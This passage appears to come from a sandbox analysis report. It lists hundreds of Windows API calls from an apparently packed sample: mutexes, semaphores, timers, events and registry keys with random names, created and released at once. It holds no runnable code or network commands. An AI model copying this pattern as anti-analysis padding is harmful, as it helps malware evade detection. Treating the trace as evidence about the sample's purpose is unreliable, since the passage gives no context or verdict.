                                                                • ResetEvent.KERNEL32(00000000), ref: 00404BED
                                                                • FindFirstFileA.KERNEL32(s_bcfre8zh,?), ref: 00404C0F
                                                                • FindClose.KERNEL32(00000000), ref: 00404C12
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXqtzx8hp7), ref: 00404C2B
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00404C36
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regiwldu3lh,00000000,00020019,?), ref: 00404C53
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_bbz60kxw), ref: 00404C6E
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404C75
                                                                • GetLastError.KERNEL32 ref: 00404C7B
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000BA0,00000000), ref: 00404C99
                                                                • FindFirstFileA.KERNEL32(s_zlpk6fi9,?), ref: 00404CB5
                                                                • FindClose.KERNEL32(00000000), ref: 00404CB8
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_tc91xtzg), ref: 00404CD3
                                                                • SetEvent.KERNEL32(00000000), ref: 00404CDC
                                                                • ResetEvent.KERNEL32(00000000), ref: 00404CE3
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_bvya3woa), ref: 00404CFE
                                                                • SetEvent.KERNEL32(00000000), ref: 00404D07
                                                                • ResetEvent.KERNEL32(00000000), ref: 00404D0E
                                                                • LocalAlloc.KERNEL32(00000000,0000037F), ref: 00404D25
                                                                • GetLastError.KERNEL32 ref: 00404D2D
                                                                • LocalFree.KERNEL32(00000000), ref: 00404D3A
                                                                • LocalAlloc.KERNEL32(00000000,0000068A), ref: 00404D4D
                                                                • LocalFree.KERNEL32(00000000), ref: 00404D54
                                                                • GetLastError.KERNEL32 ref: 00404D56
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_iysbipi4), ref: 00404D71
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404D77
                                                                • OutputDebugStringA.KERNEL32(tsv0hbria), ref: 00404D88
                                                                • SetEnvironmentVariableA.KERNEL32(iaat1l8d,4yz9begi), ref: 00404D96
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_68zl9c6n), ref: 00404DB4
                                                                • SetEnvironmentVariableA.KERNEL32(c6nxfun9,vq8nojgl), ref: 00404DC3
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00404DD1
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_0n85vc3v), ref: 00404DEA
                                                                • GetLastError.KERNEL32 ref: 00404DEE
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00404DF5
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tkqhivt6), ref: 00404E0E
                                                                • RegOpenKeyExA.KERNEL32(80000001,regpnezg2ar,00000000,00020019,?), ref: 00404E2B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00404E32
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ahhs9tdw), ref: 00404E4D
                                                                • GetLastError.KERNEL32 ref: 00404E51
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404E5C
                                                                • LocalAlloc.KERNEL32(00000000,000001D3), ref: 00404E73
                                                                • LocalFree.KERNEL32(00000000), ref: 00404E7A
                                                                • OutputDebugStringA.KERNEL32(tl1wdo764), ref: 00404E85
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_bn76k1pi), ref: 00404E9A
                                                                • OutputDebugStringA.KERNEL32(tzuizwazx), ref: 00404EA7
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00404EAA
                                                                • SetEnvironmentVariableA.KERNEL32(87039vfe,hr1ql1ui), ref: 00404EC4
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_kzkrrc42), ref: 00404EE3
                                                                • OutputDebugStringA.KERNEL32(t8x0ufnff), ref: 00404EED
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00404EF7
                                                                • FindFirstFileA.KERNEL32(s_chnzpjge,?), ref: 00404F13
                                                                • FindClose.KERNEL32(00000000), ref: 00404F1A
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXfk5pbuec), ref: 00404F33
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00404F3E
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000497,00000000), ref: 00404F5C
                                                                • CloseHandle.KERNEL32(00000000), ref: 00404F63
                                                                • OutputDebugStringA.KERNEL32(tixn00umv), ref: 00404F6E
                                                                • OutputDebugStringA.KERNEL32(ty46st8d5), ref: 00404F82
                                                                • CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_biq7qqp8), ref: 00404F9B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00404F9E
                                                                • CreateMutexA.KERNEL32(00000009,00000009,MTXdjgl1lda), ref: 00404FAB
                                                                • CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_gxvpoqaz), ref: 00404FC3
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00404FD0
                                                                • SetEnvironmentVariableA.KERNEL32(ny8b8dyz,ajncq7cv), ref: 00404FE0
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000052A,00000000), ref: 00404FFE
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00405005
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX1foxa753), ref: 00405014
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_l9vi7zsm), ref: 0040502D
                                                                • SetEnvironmentVariableA.KERNEL32(ppmrnxtn,t374uhtn), ref: 0040503B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00405048
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_upnz1jee), ref: 0040505D
                                                                • OutputDebugStringA.KERNEL32(t811wbm0h), ref: 0040506B
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00405075
                                                                • GetLastError.KERNEL32 ref: 00405079
                                                                • SetEnvironmentVariableA.KERNEL32(evp5wksa,8ch0b0dd), ref: 00405099
                                                                • SetEnvironmentVariableA.KERNEL32(ohpcw67a,fz8ld49v), ref: 004050AF
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000DD9,00000000), ref: 004050C9
                                                                • SetEnvironmentVariableA.KERNEL32(p8hh1gs2,bilwyweo), ref: 004050DB
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004050E2
                                                                • FindFirstFileA.KERNEL32(s_b2q4tb82,?), ref: 004050FE
                                                                • FindClose.KERNEL32(00000000), ref: 00405105
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_c6rtxn2e), ref: 00405120
                                                                • RegOpenKeyExA.KERNEL32(80000001,reg9vp9wahe,00000000,00020019,00409E10), ref: 00405139
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040514A
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXeuk0bqyk), ref: 0040515F
                                                                • GetLastError.KERNEL32 ref: 0040516C
                                                                • ReleaseMutex.KERNEL32(?), ref: 00405175
                                                                • OutputDebugStringA.KERNEL32(th2xy09eh), ref: 00405180
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regnw0xpzk8,00000000,00020019,?), ref: 00405199
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_nrrqvpp8), ref: 004051B2
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 004051BD
                                                                • SetEnvironmentVariableA.KERNEL32(6pms62xl,gi25app2), ref: 004051CF
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jttod3t8), ref: 004051EA
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004051F1
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg77ah2op2,00000000,00020019,?), ref: 0040520C
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLx4yqw1al), ref: 00405227
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040522E
                                                                • SetEnvironmentVariableA.KERNEL32(ouljkvyw,tspltdjl), ref: 0040523A
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_4245xtfp), ref: 00405254
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040525B
                                                                • RegOpenKeyExA.KERNEL32(80000001,regh037c70m,00000000,00020019,?), ref: 00405275
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_hkoaqvuo), ref: 0040528E
                                                                • OutputDebugStringA.KERNEL32(t9lthrm9u), ref: 00405297
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004052A4
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000010E,00000000), ref: 004052BE
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004052C5
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_2lwdmtng), ref: 004052D4
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_5rwhgvw3), ref: 004052EF
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004052F6
                                                                • RegOpenKeyExA.KERNEL32(80000001,reggwktxg2i,00000000,00020019,?), ref: 00405312
                                                                • FindFirstFileA.KERNEL32(s_fh9hh7uu,?), ref: 0040532E
                                                                • FindClose.KERNEL32(00000000), ref: 00405335
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXawf1ae1n), ref: 00405356
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00405361
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regiepztbw6,00000000,00020019,?), ref: 00405382
                                                                • OutputDebugStringA.KERNEL32(tw54zebwr), ref: 0040538D
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000007BA,00000000), ref: 004053AB
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004053AE
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000B2D,00000000), ref: 004053CC
                                                                • RegOpenKeyExA.KERNEL32(80000001,regh57c5y01,00000000,00020019,?), ref: 004053E5
                                                                • CloseHandle.KERNEL32(00000000), ref: 004053EC
                                                                • LocalAlloc.KERNEL32(00000000,000001C3), ref: 00405404
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXa8cu8u0k), ref: 0040541B
                                                                • OutputDebugStringA.KERNEL32(tgnaptnne), ref: 0040542C
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 0040542F
                                                                • SetEnvironmentVariableA.KERNEL32(i32zb19a,qvmmqy34), ref: 0040543F
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_g0k9fdn1), ref: 00405458
                                                                • OutputDebugStringA.KERNEL32(t8mzisows), ref: 00405465
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040546C
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLyoo3iq38), ref: 00405487
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405493
                                                                • OutputDebugStringA.KERNEL32(tntjlvy28), ref: 0040549A
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLea771d1v), ref: 004054B1
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004054B8
                                                                • RegOpenKeyExA.KERNEL32(80000001,regkukujc1n,00000000,00020019,?), ref: 004054D0
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXukdk5rol), ref: 004054E7
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 004054F2
                                                                • LocalAlloc.KERNEL32(00000000,000009F5), ref: 00405512
                                                                • RegOpenKeyExA.KERNEL32(80000001,regbssywy3j,00000000,00020019,?), ref: 0040552F
                                                                • LocalFree.KERNEL32(00000000), ref: 00405536
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000002EF,00000000), ref: 00405554
                                                                • RegOpenKeyExA.KERNEL32(80000001,regon8lhjmk,00000000,00020019,?), ref: 00405571
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00405578
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mkv5p20y), ref: 00405593
                                                                • SetEvent.KERNEL32(00000000), ref: 0040559C
                                                                • ResetEvent.KERNEL32(00000000), ref: 004055A3
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX659bq5ml), ref: 004055BC
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 004055C7
                                                                • OutputDebugStringA.KERNEL32(tqmqpycwx), ref: 004055D4
                                                                • SetEnvironmentVariableA.KERNEL32(y0t5yda9,jneak3tj), ref: 004055E0
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_d0ezvgky), ref: 004055F9
                                                                • OutputDebugStringA.KERNEL32(tht6hiwda), ref: 00405602
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040560F
                                                                • RegOpenKeyExA.KERNEL32(80000001,regnmhit5i7,00000000,00020019,?), ref: 00405630
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7zytb0ri), ref: 0040564B
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405652
                                                                • RegOpenKeyExA.KERNEL32(80000001,regk6y32ko4,00000000,00020019,?), ref: 0040566D
                                                                • GetLastError.KERNEL32 ref: 00405675
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLfg0ub50n), ref: 00405690
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405697
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zas83zwj), ref: 004056A3
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000777,00000000), ref: 004056C9
                                                                • OutputDebugStringA.KERNEL32(t60xwhd9g), ref: 004056D6
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 004056D9
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_942zrjhx), ref: 004056F4
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405700
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_l82rdxkg), ref: 00405715
                                                                • SetEnvironmentVariableA.KERNEL32(ldop5nfk,93s4eclk), ref: 00405728
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00405736
                                                                • OutputDebugStringA.KERNEL32(t1f98jrxw), ref: 00405741
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regkj50vwml,00000000,00020019,?), ref: 0040575A
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_08qed3dz), ref: 00405773
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040577E
                                                                • GetLastError.KERNEL32 ref: 00405784
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regso4yxzed,00000000,00020019,?), ref: 004057A1
                                                                • FindFirstFileA.KERNEL32(s_0rhtpalp,?), ref: 004057BD
                                                                • FindClose.KERNEL32(00000000), ref: 004057C4
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_rv9lsjh5), ref: 004057DD
                                                                • GetLastError.KERNEL32 ref: 004057E6
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 004057F4
                                                                • OutputDebugStringA.KERNEL32(tkcq1j60r), ref: 00405801
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX34s52bf3), ref: 00405816
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00405821
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLit26gd8c), ref: 0040583C
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405843
                                                                • LocalAlloc.KERNEL32(00000000,00000221), ref: 0040584D
                                                                • FindFirstFileA.KERNEL32(s_eutb36gm,?), ref: 00405869
                                                                • FindClose.KERNEL32(00000000), ref: 00405870
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXrulvz4cj), ref: 00405887
                                                                • RegOpenKeyExA.KERNEL32(80000001,regcybb0am7,00000000,00020019,?), ref: 004058A8
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 004058AF
                                                                • GetLastError.KERNEL32 ref: 004058BC
                                                                • OutputDebugStringA.KERNEL32(tlsubx3d4), ref: 004058C7
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_llytb8bk), ref: 004058DE
                                                                • OutputDebugStringA.KERNEL32(tgwabdohg), ref: 004058E7
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004058F5
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXj7l6ka3u), ref: 00405908
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00405913
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regfaerruq6,00000000,00020019,?), ref: 0040592F
                                                                • RegOpenKeyExA.KERNEL32(80000001,regjj3pi0uk,00000000,00020019,?), ref: 00405957
                                                                • CreateSemaphoreA.KERNEL32(00000001,00000001,00000001,XMLrxdfmajw), ref: 00405975
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000001), ref: 0040597B
                                                                • GetLastError.KERNEL32 ref: 0040597D
                                                                • CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_8q2mlbb1), ref: 0040599F
                                                                • CreateEventA.KERNEL32(00000001,00000001,00000001,ev_2yigbh0u), ref: 004059B8
                                                                • SetEvent.KERNEL32(00000000), ref: 004059C1
                                                                • ResetEvent.KERNEL32(00000000), ref: 004059C8
                                                                • CreateSemaphoreA.KERNEL32(00000001,00000001,00000001,XML796zf9ly), ref: 004059E1
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000001), ref: 004059E7
                                                                • GetLastError.KERNEL32 ref: 004059F6
                                                                • CreateWaitableTimerA.KERNEL32(00000003,00000001,WTMR_yjyspzjz), ref: 00405A13
                                                                • OutputDebugStringA.KERNEL32(t177nyisu), ref: 00405A20
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00405A27
                                                                • SetEnvironmentVariableA.KERNEL32(h3srciic,gtks8w9w), ref: 00405A43
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mf0tns34), ref: 00405A5E
                                                                • SetEvent.KERNEL32(00000000), ref: 00405A67
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405A6E
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLdv4yvvx2), ref: 00405A89
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405A8F
                                                                • OutputDebugStringA.KERNEL32(tw931ljur), ref: 00405A9A
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000037B,00000000), ref: 00405AB5
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00405ABC
                                                                • LocalAlloc.KERNEL32(00000000,0000037B), ref: 00405AC6
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_1yp16plg), ref: 00405AE5
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_vo68bl08), ref: 00405AFC
                                                                • SetEvent.KERNEL32(00000000), ref: 00405B01
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405B08
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000999,00000000), ref: 00405B26
                                                                • GetLastError.KERNEL32 ref: 00405B2E
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405B35
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLz9za5ea8), ref: 00405B5A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405B60
                                                                • SetEnvironmentVariableA.KERNEL32(krdqzy7f,q7t7v6a8), ref: 00405B70
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_83ghue7f), ref: 00405B89
                                                                • SetEvent.KERNEL32(00000000), ref: 00405B92
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405B99
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_8yh5ft3y), ref: 00405BB4
                                                                • RegOpenKeyExA.KERNEL32(80000001,regfwav6hjm,00000000,00020019,?), ref: 00405BCD
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405BD8
                                                                • GetLastError.KERNEL32 ref: 00405BE8
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000852,00000000), ref: 00405C06
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C0D
                                                                • SetEnvironmentVariableA.KERNEL32(288qh91m,m6wsuix9), ref: 00405C1D
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_bhdojfck), ref: 00405C36
                                                                • SetEvent.KERNEL32(00000000), ref: 00405C3F
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405C46
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000630,00000000), ref: 00405C64
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C6B
                                                                • SetEnvironmentVariableA.KERNEL32(7mhzuiqy,jyawzxle), ref: 00405C88
                                                                • CreateSemaphoreA.KERNEL32(00000006,00000006,00000001,XMLdav1qxqb), ref: 00405CB0
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000006), ref: 00405CB6
                                                                • RegOpenKeyExA.KERNEL32(80000001,regjwczwiv1,00000006,00020019,?), ref: 00405CD0
                                                                • CreateEventA.KERNEL32(00000006,00000001,00000006,ev_4yh9mboq), ref: 00405CE9
                                                                • SetEvent.KERNEL32(00000000), ref: 00405CF2
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405CF9
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLvl2yucl5), ref: 00405D14
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405D1A
                                                                • OutputDebugStringA.KERNEL32(tk49ljafb), ref: 00405D25
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jfnhvoos), ref: 00405D3A
                                                                • OutputDebugStringA.KERNEL32(txmwu9rge), ref: 00405D43
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405D4A
                                                                • GetLastError.KERNEL32 ref: 00405D64
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_2tpf3k9u), ref: 00405D7D
                                                                • SetEnvironmentVariableA.KERNEL32(vqbq3kvg,u6m5ltiw), ref: 00405D8F
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00405D9A
                                                                • RegOpenKeyExA.ADVAPI32(80000001,reg4t533bzq,00000000,00020019,?), ref: 00405DB7
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001180,00000000), ref: 00405DD5
                                                                • SetEnvironmentVariableA.KERNEL32(nser2o02,ynm9y2h9), ref: 00405DE7
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00405DEE
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000654,00000000), ref: 00405E0C
                                                                • GetLastError.KERNEL32 ref: 00405E14
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405E1B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jbdif3fc), ref: 00405E36
                                                                • SetEnvironmentVariableA.KERNEL32(c82yqntn,vgko7r23), ref: 00405E44
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405E4F
                                                                • FindFirstFileA.KERNEL32(s_34kdzx3i,?), ref: 00405E6B
                                                                • FindClose.KERNEL32(00000000), ref: 00405E72
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000011FB,00000000), ref: 00405E90
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405E97
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_1b5rxocf), ref: 00405EAB
                                                                • GetLastError.KERNEL32 ref: 00405EB7
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ywqblgmo), ref: 00405ED0
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00405ED7
                                                                • SetEnvironmentVariableA.KERNEL32(pd3ssdbv,ap1varzm), ref: 00405EE7
                                                                • OutputDebugStringA.KERNEL32(tov5q26c7), ref: 00405EFF
                                                                • FindFirstFileA.KERNEL32(s_lbbp44mn,?), ref: 00405F1C
                                                                • FindClose.KERNEL32(00000000), ref: 00405F23
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C0A,00000000), ref: 00405F41
                                                                • OutputDebugStringA.KERNEL32(t00dnerjm), ref: 00405F4E
                                                                • CloseHandle.KERNEL32(00000000), ref: 00405F51
                                                                • OutputDebugStringA.KERNEL32(tz5kl8u5q), ref: 00405F66
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_9cfo1p3l), ref: 00405F7D
                                                                • SetEvent.KERNEL32(00000000), ref: 00405F86
                                                                • ResetEvent.KERNEL32(00000000), ref: 00405F8D
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tes47dmi), ref: 00405FA7
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00405FB2
                                                                • OutputDebugStringA.KERNEL32(tqpd21biq), ref: 00405FBD
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLt0k88dpd), ref: 00405FD2
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000674,00000000), ref: 00405FEA
                                                                • OutputDebugStringA.KERNEL32(tp9vj0b43), ref: 00405FF7
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00405FFA
                                                                • LocalAlloc.KERNEL32(00000000,00000906), ref: 00406011
                                                                • SetEnvironmentVariableA.KERNEL32(p6xpux7o,gqnuu3oi), ref: 00406023
                                                                • LocalFree.KERNEL32(00000000), ref: 0040602A
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0vwx5qqa), ref: 00406045
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040604B
                                                                • LocalAlloc.KERNEL32(00000000,00000D50), ref: 0040605D
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000000C6,00000000), ref: 00406077
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040607E
                                                                • LocalAlloc.KERNEL32(00000000,00000379), ref: 0040608B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_65h3azn8), ref: 004060A2
                                                                • SetEnvironmentVariableA.KERNEL32(q61o789w,c6qmvpwn), ref: 004060B0
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004060BB
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5k43o4b3), ref: 004060D6
                                                                • SetEvent.KERNEL32(00000000), ref: 004060DF
                                                                • ResetEvent.KERNEL32(00000000), ref: 004060E6
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLlr84ct8q), ref: 00406101
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00406107
                                                                • OutputDebugStringA.KERNEL32(tm7gm98q4), ref: 00406115
                                                                • CreateWaitableTimerA.KERNEL32(00000004,00000001,WTMR_3ulozhve), ref: 0040612E
                                                                • GetLastError.KERNEL32 ref: 00406136
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00406141
                                                                • SetEnvironmentVariableA.KERNEL32(6okdm1tu,3ctj9t2x), ref: 00406151
                                                                • LocalAlloc.KERNEL32(00000000,000005B0), ref: 00406168
                                                                • OutputDebugStringA.KERNEL32(tiklkzfzv), ref: 00406175
                                                                • LocalFree.KERNEL32(00000000), ref: 00406178
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_efiowg0u), ref: 00406191
                                                                • OutputDebugStringA.KERNEL32(tb5ozaklm), ref: 0040619E
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 004061A1
                                                                • LocalAlloc.KERNEL32(00000000,000001ED), ref: 004061B9
                                                                • LocalFree.KERNEL32(00000000), ref: 004061C0
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLqrpms3fl), ref: 004061D9
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004061DF
                                                                • FindFirstFileA.KERNEL32(t0yhzp32e), ref: 004061EA
                                                                • FindFirstFileA.KERNEL32(s_nxlib5zf,?), ref: 00406208
                                                                • FindClose.KERNEL32(00000000), ref: 0040620B
                                                                • FindFirstFileA.KERNEL32(s_aor9vzq7,?), ref: 00406227
                                                                • FindClose.KERNEL32(00000000), ref: 0040622A
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_tk2vs67b), ref: 00406245
                                                                • SetEvent.KERNEL32(00000000), ref: 0040624E
                                                                • ResetEvent.KERNEL32(00000000), ref: 00406255
                                                                • LocalAlloc.KERNEL32(00000000,00000415), ref: 0040626C
                                                                • RegOpenKeyExA.KERNEL32(80000001,reg48zflry0,00000000,00020019,?), ref: 00406289
                                                                • LocalFree.KERNEL32(00000000), ref: 00406290
